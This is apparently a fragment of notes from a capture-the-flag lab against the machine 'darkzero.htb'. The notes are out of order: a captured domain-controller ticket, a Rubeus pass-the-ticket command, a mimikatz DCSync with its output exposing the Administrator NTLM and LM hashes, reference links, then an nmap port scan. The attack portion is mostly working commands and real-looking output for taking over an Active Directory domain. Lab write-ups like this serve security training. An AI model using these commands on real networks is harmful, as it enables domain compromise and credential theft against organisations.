EndTime : 11/18/2025 2:20:05 AM
RenewTill : 11/24/2025 4:20:05 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
[base64 ticket omitted]
Rubeus.exe ptt /ticket:<base64 ticket from monitor> #inject DC01$'s TGT; a DC account has replication rights in its own domain, so DCSync darkzero.htb from here
mimikatz.exe "lsadump::dcsync /domain:darkzero.htb /user:Administrator"
mimikatz(commandline) # lsadump::dcsync /domain:darkzero.htb /user:Administrator
[DC] 'darkzero.htb' will be the domain
[DC] 'DC01.darkzero.htb' will be the DC server
[DC] 'Administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 9/10/2025 8:42:44 AM
Object Security ID : S-1-5-21-1152179935-589108180-1989892463-500
Object Relative ID : 500
Credentials:
Hash NTLM: 5917507bdf2ef2c2b0a869a1cba40726
ntlm- 0: 5917507bdf2ef2c2b0a869a1cba40726
ntlm- 1: 5917507bdf2ef2c2b0a869a1cba40726
lm - 0: 58ef66870a9927dd48b3bd9d7e03845f
Administrator:5917507bdf2ef2c2b0a869a1cba40726
https://bloodhound.specterops.io/resources/edges/abuse-tgt-delegation
https://blog.salucci.ch/docs/HackingLab/HackTheBox/SOC-Analyst/Coercing-Attacks/
https://specterops.io/blog/2025/06/25/good-fences-make-good-neighbors-new-ad-trusts-attack-paths-in-bloodhound/
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49693/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49911/tcp open msrpc Microsoft Windows RPC
49942/tcp open msrpc Microsoft Windows RPC
49989/tcp open msrpc Microsoft Windows RPC
50001/tcp open msrpc Microsoft Windows RPC
52841/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
